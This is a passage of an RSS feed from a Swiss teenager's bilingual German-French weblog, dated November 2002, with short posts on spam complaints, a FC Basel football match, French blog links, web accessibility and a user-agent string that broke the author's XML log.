  14261.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=178</guid>
  14262.    <dc:creator>Andreas Jaggi</dc:creator>
  14263.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14264.    <pubDate>Mon, 18 Nov 2002 00:44:00 +0000</pubDate>
  14265.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14266.    <description><![CDATA[<a href="http://www.airport1.de/einstein.htm"><b>Einstein's Rätsel</b></a>, das nur 2% der Weltbevölkerung lösen können sollen. Ich hab's geschafft, ich gehör zu den 2 intelligentesten % der Erde ;-)<br><br>via <a href="http://www.elfengleich.de/"><b>e.loge</b></a>
  14267. ]]></description>
  14268.    <content:encoded><![CDATA[<a href="http://www.airport1.de/einstein.htm"><b>Einstein's Rätsel</b></a>, das nur 2% der Weltbevölkerung lösen können sollen. Ich hab's geschafft, ich gehör zu den 2 intelligentesten % der Erde ;-)<br><br>via <a href="http://www.elfengleich.de/"><b>e.loge</b></a>
  14269. ]]></content:encoded>
  14270.  </item>
  14271.  
  14272.  <item>
  14273.    <title>Anti-Ads</title>
  14274.    <link>https://blog.x-way.org/Misc/2002/11/17/Anti-Ads.html</link>
  14275.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=177</guid>
  14276.    <dc:creator>Andreas Jaggi</dc:creator>
  14277.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14278.    <pubDate>Sun, 17 Nov 2002 22:10:00 +0000</pubDate>
  14279.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14280.    <description><![CDATA[Auf <a href="http://detritus.net/"><b>detritus.net</b></a> gibt es das Anti-Ads-Projekt, welches Parodien verschiedener Werbebanner macht.<br><br><img alt="Monitor Giveaway" src="https://blog.x-way.org/images/monitor_giveaway.gif"><br><br><img alt="Virusalert" src="https://blog.x-way.org/images/virusalert.gif"><br><br><img alt="Epilepsy" src="https://blog.x-way.org/images/epilepsy.gif"><br><br><img alt="Supportcyberterrorism" src="https://blog.x-way.org/images/supportcyberterrorism.gif">
  14281. ]]></description>
  14282.    <content:encoded><![CDATA[Auf <a href="http://detritus.net/"><b>detritus.net</b></a> gibt es das Anti-Ads-Projekt, welches Parodien verschiedener Werbebanner macht.<br><br><img alt="Monitor Giveaway" src="https://blog.x-way.org/images/monitor_giveaway.gif"><br><br><img alt="Virusalert" src="https://blog.x-way.org/images/virusalert.gif"><br><br><img alt="Epilepsy" src="https://blog.x-way.org/images/epilepsy.gif"><br><br><img alt="Supportcyberterrorism" src="https://blog.x-way.org/images/supportcyberterrorism.gif">
  14283. ]]></content:encoded>
  14284.  </item>
  14285.  
  14286.  <item>
  14287.    <title>Paris</title>
  14288.    <link>https://blog.x-way.org/Misc/2002/11/17/Paris1.html</link>
  14289.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=176</guid>
  14290.    <dc:creator>Andreas Jaggi</dc:creator>
  14291.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14292.    <pubDate>Sun, 17 Nov 2002 14:22:00 +0000</pubDate>
  14293.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14294.    <description><![CDATA[<a href="http://parispourvous.com/"><b>parispourvous.com</b></a> est une autre website de Paris. Il y a 25 webcams et 240 photos panoramique.<br>Regardez-le!
  14295. ]]></description>
  14296.    <content:encoded><![CDATA[<a href="http://parispourvous.com/"><b>parispourvous.com</b></a> est une autre website de Paris. Il y a 25 webcams et 240 photos panoramique.<br>Regardez-le!
  14297. ]]></content:encoded>
  14298.  </item>
  14299.  
  14300.  <item>
  14301.    <title>Nein ich will eure Kamera-Attrape nicht!</title>
  14302.    <link>https://blog.x-way.org/Misc/2002/11/17/Nein_ich_will_eure_Kamera-Attrape_nicht.html</link>
  14303.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=175</guid>
  14304.    <dc:creator>Andreas Jaggi</dc:creator>
  14305.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14306.    <pubDate>Sun, 17 Nov 2002 12:36:00 +0000</pubDate>
  14307.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14308.    <description><![CDATA[Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich<br><br>Merken die eigentlich nicht, dass sie ihrem Ruf mit dem Spam nur schaden?<br>Ich würde wetten, dass die Erfolgsqoute bei ihren Spam-Angebote unter 1 % liegt!
  14309. ]]></description>
  14310.    <content:encoded><![CDATA[Business Corporation for W+L. AG, Rautistrasse 71, 8048 Zürich<br><br>Merken die eigentlich nicht, dass sie ihrem Ruf mit dem Spam nur schaden?<br>Ich würde wetten, dass die Erfolgsqoute bei ihren Spam-Angebote unter 1 % liegt!
  14311. ]]></content:encoded>
  14312.  </item>
  14313.  
  14314.  <item>
  14315.    <title>Jungbürgerfeier</title>
  14316.    <link>https://blog.x-way.org/Misc/2002/11/17/Jungbuergerfeier.html</link>
  14317.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=174</guid>
  14318.    <dc:creator>Andreas Jaggi</dc:creator>
  14319.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14320.    <pubDate>Sun, 17 Nov 2002 12:21:00 +0000</pubDate>
  14321.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14322.    <description><![CDATA[Gestern Abend war Jungbürgerfeier und ich habe irgendwelche mystischen Papiere  bekommen.<br>... und nun hab ich Kopfschmerzen.<br>Mehr brauch ich dazu wohl nicht zu sagen ...
  14323. ]]></description>
  14324.    <content:encoded><![CDATA[Gestern Abend war Jungbürgerfeier und ich habe irgendwelche mystischen Papiere  bekommen.<br>... und nun hab ich Kopfschmerzen.<br>Mehr brauch ich dazu wohl nicht zu sagen ...
  14325. ]]></content:encoded>
  14326.  </item>
  14327.  
  14328.  <item>
  14329.    <title>Zur Abwechslung</title>
  14330.    <link>https://blog.x-way.org/Misc/2002/11/14/Zur_Abwechslung.html</link>
  14331.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=173</guid>
  14332.    <dc:creator>Andreas Jaggi</dc:creator>
  14333.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14334.    <pubDate>Thu, 14 Nov 2002 23:33:00 +0000</pubDate>
  14335.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14336.    <description><![CDATA[<a href="https://blog.x-way.org/images/14112002233023.jpg"><b>Hier</b></a> hat es einen aktuellen Screenshots meines Desktops.
  14337. ]]></description>
  14338.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/images/14112002233023.jpg"><b>Hier</b></a> hat es einen aktuellen Screenshots meines Desktops.
  14339. ]]></content:encoded>
  14340.  </item>
  14341.  
  14342.  <item>
  14343.    <title>Dune du Pilat</title>
  14344.    <link>https://blog.x-way.org/Misc/2002/11/14/Dune_du_Pilat.html</link>
  14345.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=172</guid>
  14346.    <dc:creator>Andreas Jaggi</dc:creator>
  14347.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14348.    <pubDate>Thu, 14 Nov 2002 21:47:00 +0000</pubDate>
  14349.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14350.    <description><![CDATA[La Dune du Pilat est la plus haute d'Europe: 117 m.<br>Elle est située à côté du bassin d'Arcachon.<br>J'étais plusieurs fois là et c'ètait chaque fois une impréssion merveilleuse et inoublieable!<br><br>Bon, d'un scan d'une carte postale j'ai fait ce wallpaper <a href="https://blog.x-way.org/images/pilat.jpg"><b>là</b></a> car j'aime beaucoup cette région.
  14351. ]]></description>
  14352.    <content:encoded><![CDATA[La Dune du Pilat est la plus haute d'Europe: 117 m.<br>Elle est située à côté du bassin d'Arcachon.<br>J'étais plusieurs fois là et c'ètait chaque fois une impréssion merveilleuse et inoublieable!<br><br>Bon, d'un scan d'une carte postale j'ai fait ce wallpaper <a href="https://blog.x-way.org/images/pilat.jpg"><b>là</b></a> car j'aime beaucoup cette région.
  14353. ]]></content:encoded>
  14354.  </item>
  14355.  
  14356.  <item>
  14357.    <title>A remarquer</title>
  14358.    <link>https://blog.x-way.org/Misc/2002/11/14/A_remarquer.html</link>
  14359.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=171</guid>
  14360.    <dc:creator>Andreas Jaggi</dc:creator>
  14361.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14362.    <pubDate>Thu, 14 Nov 2002 00:29:00 +0000</pubDate>
  14363.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14364.    <description><![CDATA[<a href="https://web.archive.org/web/20021204194214/http://www.martinepage.com/blog/"><b>ni vu ni connu</b></a> est aussi un blogue bilingue: français - anglais<br>
  14365. <a href="https://web.archive.org/web/20021011104904/http://radio.weblogs.com/0100301/"><b>xtof. Carnet Web.</b></a> traite les outils de publication et d'échange.
  14366.  
  14367. ]]></description>
  14368.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021204194214/http://www.martinepage.com/blog/"><b>ni vu ni connu</b></a> est aussi un blogue bilingue: français - anglais<br>
  14369. <a href="https://web.archive.org/web/20021011104904/http://radio.weblogs.com/0100301/"><b>xtof. Carnet Web.</b></a> traite les outils de publication et d'échange.
  14370.  
  14371. ]]></content:encoded>
  14372.  </item>
  14373.  
  14374.  <item>
  14375.    <title>Fatiguéant</title>
  14376.    <link>https://blog.x-way.org/School/2002/11/13/Fatigueant.html</link>
  14377.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=170</guid>
  14378.    <dc:creator>Andreas Jaggi</dc:creator>
  14379.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14380.    <pubDate>Wed, 13 Nov 2002 23:54:00 +0000</pubDate>
  14381.    <category domain="https://blog.x-way.org/School">School</category>
  14382.    <description><![CDATA[Aujourd'hui je me suis présque endormi en école car je n'ai que dort une heure la dernière nuit. Bon, aux maths en traitait le calcul des probabilités et je devais me dire tout le temps: 'Ne ferme pas tes yeux...' car c'était si ennuyeux ;-)
  14383. ]]></description>
  14384.    <content:encoded><![CDATA[Aujourd'hui je me suis présque endormi en école car je n'ai que dort une heure la dernière nuit. Bon, aux maths en traitait le calcul des probabilités et je devais me dire tout le temps: 'Ne ferme pas tes yeux...' car c'était si ennuyeux ;-)
  14385. ]]></content:encoded>
  14386.  </item>
  14387.  
  14388.  <item>
  14389.    <title>Verhaut die Spammer !!!</title>
  14390.    <link>https://blog.x-way.org/Misc/2002/11/13/Verhaut_die_Spammer_.html</link>
  14391.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=169</guid>
  14392.    <dc:creator>Andreas Jaggi</dc:creator>
  14393.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14394.    <pubDate>Wed, 13 Nov 2002 02:54:00 +0000</pubDate>
  14395.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14396.    <description><![CDATA[Nein, 'CH - Versandhandel, Albulastrasse 47, 8048 Zürich' ich will deine 'DVD Movie Copy' nicht!<br>Nein, auch nicht wenn du mir auf jeden Mail-Account deine Werbe-Mails in vielfacher ausführung schickst!<br>Nein! Nicht!<br><br>Genausowenig will ich deine Werbe-Mails! Nein, wirklich nicht! Nein! Nicht! Nie!
  14397. ]]></description>
  14398.    <content:encoded><![CDATA[Nein, 'CH - Versandhandel, Albulastrasse 47, 8048 Zürich' ich will deine 'DVD Movie Copy' nicht!<br>Nein, auch nicht wenn du mir auf jeden Mail-Account deine Werbe-Mails in vielfacher ausführung schickst!<br>Nein! Nicht!<br><br>Genausowenig will ich deine Werbe-Mails! Nein, wirklich nicht! Nein! Nicht! Nie!
  14399. ]]></content:encoded>
  14400.  </item>
  14401.  
  14402.  <item>
  14403.    <title>3 : 3</title>
  14404.    <link>https://blog.x-way.org/Misc/2002/11/12/3__3.html</link>
  14405.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=168</guid>
  14406.    <dc:creator>Andreas Jaggi</dc:creator>
  14407.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14408.    <pubDate>Tue, 12 Nov 2002 23:00:00 +0000</pubDate>
  14409.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14410.    <description><![CDATA[So lautet das Endresultat des Fussballmatches. Dies bewirkt nun, dass der FC Basel in der Championsleague weiterkommt. Jedoch scheidet damit der FC Liverpool aus. *hehe*<br><br><a href="http://www.fcb.ch/"><b><span style="color: #ff0000;">F</span><span style="color: #0000FF;">C</span><span style="color: #FF0000;">B</span><span style="color: #0000FF">!</span></b></a>
  14411. ]]></description>
  14412.    <content:encoded><![CDATA[So lautet das Endresultat des Fussballmatches. Dies bewirkt nun, dass der FC Basel in der Championsleague weiterkommt. Jedoch scheidet damit der FC Liverpool aus. *hehe*<br><br><a href="http://www.fcb.ch/"><b><span style="color: #ff0000;">F</span><span style="color: #0000FF;">C</span><span style="color: #FF0000;">B</span><span style="color: #0000FF">!</span></b></a>
  14413. ]]></content:encoded>
  14414.  </item>
  14415.  
  14416.  <item>
  14417.    <title>Live</title>
  14418.    <link>https://blog.x-way.org/Misc/2002/11/12/Live.html</link>
  14419.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=167</guid>
  14420.    <dc:creator>Andreas Jaggi</dc:creator>
  14421.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14422.    <pubDate>Tue, 12 Nov 2002 21:55:00 +0000</pubDate>
  14423.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14424.    <description><![CDATA[Ach ja, falls jemand eine Website kennt, auf der man Live das laufende Spiel verfolgen könnte, wär's natürlich nett, wenn man sie mir mitteilen würde ;-)
  14425. ]]></description>
  14426.    <content:encoded><![CDATA[Ach ja, falls jemand eine Website kennt, auf der man Live das laufende Spiel verfolgen könnte, wär's natürlich nett, wenn man sie mir mitteilen würde ;-)
  14427. ]]></content:encoded>
  14428.  </item>
  14429.  
  14430.  <item>
  14431.    <title>Spick</title>
  14432.    <link>https://blog.x-way.org/School/2002/11/12/Spick.html</link>
  14433.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=166</guid>
  14434.    <dc:creator>Andreas Jaggi</dc:creator>
  14435.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14436.    <pubDate>Tue, 12 Nov 2002 21:52:00 +0000</pubDate>
  14437.    <category domain="https://blog.x-way.org/School">School</category>
  14438.    <description><![CDATA[Wer Informationen in den Fächern Deutsch oder Geschichte sucht, wird auf der <a href="https://web.archive.org/web/20021026155134/http://mypage.bluewin.ch/Looser.Roman/"><b>Website von Roman Looser</b></a> bestimmt fündig.<br><br>Das Zeugs wär ja eigentlich vor allem für Lehrer bestimmt, aber wenn man's auf Internet stellt, muss man damit rechnen, dass es die Schüler finden ;-)
  14439. ]]></description>
  14440.    <content:encoded><![CDATA[Wer Informationen in den Fächern Deutsch oder Geschichte sucht, wird auf der <a href="https://web.archive.org/web/20021026155134/http://mypage.bluewin.ch/Looser.Roman/"><b>Website von Roman Looser</b></a> bestimmt fündig.<br><br>Das Zeugs wär ja eigentlich vor allem für Lehrer bestimmt, aber wenn man's auf Internet stellt, muss man damit rechnen, dass es die Schüler finden ;-)
  14441. ]]></content:encoded>
  14442.  </item>
  14443.  
  14444.  <item>
  14445.    <title>Basel - Liverpool</title>
  14446.    <link>https://blog.x-way.org/Misc/2002/11/12/Basel_-_Liverpool.html</link>
  14447.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=165</guid>
  14448.    <dc:creator>Andreas Jaggi</dc:creator>
  14449.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14450.    <pubDate>Tue, 12 Nov 2002 21:45:00 +0000</pubDate>
  14451.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14452.    <description><![CDATA[Für alle 'normalen' Leute:<br>Heute spielt der FC Basel in der Championsleague gegen den FC Liverpool.<br>'Dramatik' der Situation: Ein Sieg Basels würde Liverpool von der weiteren Championsleague ausschliessen, ein Sieg Liverpools dasselbe mit Basel.<br>Aktueller Stand (nach 1. Halbzeit):<br><b>3 : 0</b> für den FC Basel<br><br>Ein besonderer Gruss hierbei an meine Freunde vor der 'Grossleinwand' im Chemiezimmer. Prost!
  14453. ]]></description>
  14454.    <content:encoded><![CDATA[Für alle 'normalen' Leute:<br>Heute spielt der FC Basel in der Championsleague gegen den FC Liverpool.<br>'Dramatik' der Situation: Ein Sieg Basels würde Liverpool von der weiteren Championsleague ausschliessen, ein Sieg Liverpools dasselbe mit Basel.<br>Aktueller Stand (nach 1. Halbzeit):<br><b>3 : 0</b> für den FC Basel<br><br>Ein besonderer Gruss hierbei an meine Freunde vor der 'Grossleinwand' im Chemiezimmer. Prost!
  14455. ]]></content:encoded>
  14456.  </item>
  14457.  
  14458.  <item>
  14459.    <title>francoblogs</title>
  14460.    <link>https://blog.x-way.org/Misc/2002/11/11/francoblogs.html</link>
  14461.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=164</guid>
  14462.    <dc:creator>Andreas Jaggi</dc:creator>
  14463.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14464.    <pubDate>Mon, 11 Nov 2002 23:40:00 +0000</pubDate>
  14465.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14466.    <description><![CDATA[en blog <a href="http://www.garoo.net/"><b>garoo.net</b></a> on trouve aussi des logiciels. p.ex. une horloge transparente.<br>
  14467. <a href="https://web.archive.org/web/20021125162413/http://www.asa.fr.st/"><b>Geek Grrl</b></a> est le blog d'une femme ordinateuse ;-)<br>
  14468. et le <a href="https://web.archive.org/web/20021112084230/http://bingirl.free.fr/"><b>bingirl</b></a> est 'Pretty on the inside'
  14469. ]]></description>
  14470.    <content:encoded><![CDATA[en blog <a href="http://www.garoo.net/"><b>garoo.net</b></a> on trouve aussi des logiciels. p.ex. une horloge transparente.<br>
  14471. <a href="https://web.archive.org/web/20021125162413/http://www.asa.fr.st/"><b>Geek Grrl</b></a> est le blog d'une femme ordinateuse ;-)<br>
  14472. et le <a href="https://web.archive.org/web/20021112084230/http://bingirl.free.fr/"><b>bingirl</b></a> est 'Pretty on the inside'
  14473. ]]></content:encoded>
  14474.  </item>
  14475.  
  14476.  <item>
  14477.    <title>Was für die ganz Harten</title>
  14478.    <link>https://blog.x-way.org/Linux/2002/11/11/Was_fuer_die_ganz_Harten.html</link>
  14479.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=163</guid>
  14480.    <dc:creator>Andreas Jaggi</dc:creator>
  14481.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14482.    <pubDate>Mon, 11 Nov 2002 22:08:00 +0000</pubDate>
  14483.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  14484.    <description><![CDATA[Für die wirklich Harten, wird <a href="https://web.archive.org/web/20021124000224/http://rootforum.de"><b>rootforum.de</b></a> schon bekannt sein.<br><br>Für alle anderen Harten, gibts <a href="https://web.archive.org/web/20021124013659/http://www.everythinglinux.com.au"><b>hier</b></a> harte Sachen wie z.B. dieses <a href="https://web.archive.org/web/20021120202846/http://www.everythinglinux.com.au/item/winfreetape"><b>"WINDOWS FREE ZONE"-Absperrband</b></a> ;-)
  14485. ]]></description>
  14486.    <content:encoded><![CDATA[Für die wirklich Harten, wird <a href="https://web.archive.org/web/20021124000224/http://rootforum.de"><b>rootforum.de</b></a> schon bekannt sein.<br><br>Für alle anderen Harten, gibts <a href="https://web.archive.org/web/20021124013659/http://www.everythinglinux.com.au"><b>hier</b></a> harte Sachen wie z.B. dieses <a href="https://web.archive.org/web/20021120202846/http://www.everythinglinux.com.au/item/winfreetape"><b>"WINDOWS FREE ZONE"-Absperrband</b></a> ;-)
  14487. ]]></content:encoded>
  14488.  </item>
  14489.  
  14490.  <item>
  14491.    <title>Argh</title>
  14492.    <link>https://blog.x-way.org/Misc/2002/11/11/Argh.html</link>
  14493.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=162</guid>
  14494.    <dc:creator>Andreas Jaggi</dc:creator>
  14495.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14496.    <pubDate>Mon, 11 Nov 2002 16:33:00 +0000</pubDate>
  14497.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14498.    <description><![CDATA[Verhaut die blöden Spammer!<br><br>CH - Versandhandel, Albulastrasse 47, 8048 Zürich<br>Telefax: 056 - 610 59 46<br>Bestelltelefon: 056 - 610 59 45<br>SMS: 079 - 232 67 88
  14499. ]]></description>
  14500.    <content:encoded><![CDATA[Verhaut die blöden Spammer!<br><br>CH - Versandhandel, Albulastrasse 47, 8048 Zürich<br>Telefax: 056 - 610 59 46<br>Bestelltelefon: 056 - 610 59 45<br>SMS: 079 - 232 67 88
  14501. ]]></content:encoded>
  14502.  </item>
  14503.  
  14504.  <item>
  14505.    <title>Plongez dans l'accessibilité</title>
  14506.    <link>https://blog.x-way.org/Webdesign/2002/11/10/Plongez_dans_laccessibilite.html</link>
  14507.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=161</guid>
  14508.    <dc:creator>Andreas Jaggi</dc:creator>
  14509.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14510.    <pubDate>Sun, 10 Nov 2002 21:30:00 +0000</pubDate>
  14511.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14512.    <description><![CDATA[<a href="http://www.la-grange.net/accessibilite/"><b>Plongez dans l'accessibilité</b></a> vous guide à faire votre site accessible. Très important!<br>Bon, je sais que mon weblog n'est pas encore accessible, mais je travaille à la vérsion suivante et celle-ci serait vraiment accessible :-)
  14513. ]]></description>
  14514.    <content:encoded><![CDATA[<a href="http://www.la-grange.net/accessibilite/"><b>Plongez dans l'accessibilité</b></a> vous guide à faire votre site accessible. Très important!<br>Bon, je sais que mon weblog n'est pas encore accessible, mais je travaille à la vérsion suivante et celle-ci serait vraiment accessible :-)
  14515. ]]></content:encoded>
  14516.  </item>
  14517.  
  14518.  <item>
  14519.    <title>Literatur kann lustig sein</title>
  14520.    <link>https://blog.x-way.org/Misc/2002/11/10/Literatur_kann_lustig_sein.html</link>
  14521.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=160</guid>
  14522.    <dc:creator>Andreas Jaggi</dc:creator>
  14523.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14524.    <pubDate>Sun, 10 Nov 2002 16:42:00 +0000</pubDate>
  14525.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14526.    <description><![CDATA[<i>"[...], liebt euch wie die Kaninchen und seid glücklich!"</i><br><br>Dieses Zitat stammt aus <a href="http://gutenberg.spiegel.de/eichndrf/taugen1/taugncht.htm"><b>"Aus dem Leben eines Taugenichts"</b></a> von <a href="http://gutenberg.spiegel.de/autoren/eichndrf.htm"><b>Joseph v. Eichendorff</b></a>
  14527. ]]></description>
  14528.    <content:encoded><![CDATA[<i>"[...], liebt euch wie die Kaninchen und seid glücklich!"</i><br><br>Dieses Zitat stammt aus <a href="http://gutenberg.spiegel.de/eichndrf/taugen1/taugncht.htm"><b>"Aus dem Leben eines Taugenichts"</b></a> von <a href="http://gutenberg.spiegel.de/autoren/eichndrf.htm"><b>Joseph v. Eichendorff</b></a>
  14529. ]]></content:encoded>
  14530.  </item>
  14531.  
  14532.  <item>
  14533.    <title>FR_BLOG</title>
  14534.    <link>https://blog.x-way.org/Webdesign/2002/11/10/FR_BLOG.html</link>
  14535.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=159</guid>
  14536.    <dc:creator>Andreas Jaggi</dc:creator>
  14537.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14538.    <pubDate>Sun, 10 Nov 2002 02:40:00 +0000</pubDate>
  14539.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14540.    <description><![CDATA[<a href="https://web.archive.org/web/20021014084326/http://membres.lycos.fr/connecticut/frblog/"><b>FR_BLOG</b></a> c'est une repertoire des weblogs français et francophones.
  14541. ]]></description>
  14542.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021014084326/http://membres.lycos.fr/connecticut/frblog/"><b>FR_BLOG</b></a> c'est une repertoire des weblogs français et francophones.
  14543. ]]></content:encoded>
  14544.  </item>
  14545.  
  14546.  <item>
  14547.    <title>Les standards du W3C</title>
  14548.    <link>https://blog.x-way.org/Webdesign/2002/11/10/Les_standards_du_W3C.html</link>
  14549.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=158</guid>
  14550.    <dc:creator>Andreas Jaggi</dc:creator>
  14551.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14552.    <pubDate>Sun, 10 Nov 2002 02:38:00 +0000</pubDate>
  14553.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  14554.    <description><![CDATA[<a href="https://web.archive.org/web/20021201230339/http://www.nitot.com/standards/blog/"><b>Le StandBLog</b></a> traite les standards du <a href="https://www.w3.org/"><b>W3C</b></a>.
  14555. ]]></description>
  14556.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021201230339/http://www.nitot.com/standards/blog/"><b>Le StandBLog</b></a> traite les standards du <a href="https://www.w3.org/"><b>W3C</b></a>.
  14557. ]]></content:encoded>
  14558.  </item>
  14559.  
  14560.  <item>
  14561.    <title>Légalisez-le!</title>
  14562.    <link>https://blog.x-way.org/Misc/2002/11/09/Legalisez-le.html</link>
  14563.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=157</guid>
  14564.    <dc:creator>Andreas Jaggi</dc:creator>
  14565.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14566.    <pubDate>Sat, 09 Nov 2002 23:34:00 +0000</pubDate>
  14567.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14568.    <description><![CDATA[<br><img src="https://blog.x-way.org/images/cannabis_ny.jpg" style="border: 1px solid #000000" alt="chanvre en new york"><br><br>Trouvé dans <a href="http://quimbo.antville.org/"><b>blog de quimbo</b></a>.
  14569. ]]></description>
  14570.    <content:encoded><![CDATA[<br><img src="https://blog.x-way.org/images/cannabis_ny.jpg" style="border: 1px solid #000000" alt="chanvre en new york"><br><br>Trouvé dans <a href="http://quimbo.antville.org/"><b>blog de quimbo</b></a>.
  14571. ]]></content:encoded>
  14572.  </item>
  14573.  
  14574.  <item>
  14575.    <title>Ach menno</title>
  14576.    <link>https://blog.x-way.org/Misc/2002/11/09/Ach_menno.html</link>
  14577.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=156</guid>
  14578.    <dc:creator>Andreas Jaggi</dc:creator>
  14579.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14580.    <pubDate>Sat, 09 Nov 2002 20:34:00 +0000</pubDate>
  14581.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14582.    <description><![CDATA[Nun kommt doch so ein Hoschi mit diesem UA-String:<pre>Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; AT&amp;T WNS5.2)</pre>und schon kann ich mein XML-Logfile nicht mehr ansehen, weils nicht mehr Standardkonform ist :-(
  14583. ]]></description>
  14584.    <content:encoded><![CDATA[Nun kommt doch so ein Hoschi mit diesem UA-String:<pre>Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; AT&amp;T WNS5.2)</pre>und schon kann ich mein XML-Logfile nicht mehr ansehen, weils nicht mehr Standardkonform ist :-(
  14585. ]]></content:encoded>
  14586.  </item>
  14587.  
  14588.  <item>
  14589.    <title>Nicht interessant ;-)</title>
  14590.    <link>https://blog.x-way.org/Misc/2002/11/09/Nicht_interessant_-.html</link>
  14591.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=155</guid>
  14592.    <dc:creator>Andreas Jaggi</dc:creator>
  14593.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14594.    <pubDate>Sat, 09 Nov 2002 20:31:00 +0000</pubDate>
  14595.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  14596.    <description><![CDATA[Heut ist ja der 9.11. und wenn man die Zahlen vertauscht ist der ...
  14597. ]]></description>
  14598.    <content:encoded><![CDATA[Heut ist ja der 9.11. und wenn man die Zahlen vertauscht ist der ...
  14599. ]]></content:encoded>
  14600.  </item>
  14601.  
  14602.  <item>
  14603.    <title>Réglage (!!) --></title>
  14604.    <link>https://blog.x-way.org/Coding/2002/11/09/Reglage__--.html</link>
  14605.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=154</guid>
  14606.    <dc:creator>Andreas Jaggi</dc:creator>
  14607.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  14608.    <pubDate>Sat, 09 Nov 2002 18:24:00 +0000</pubDate>
  14609.    <category domain="https://blog.x-way.org/Coding">Coding</category>
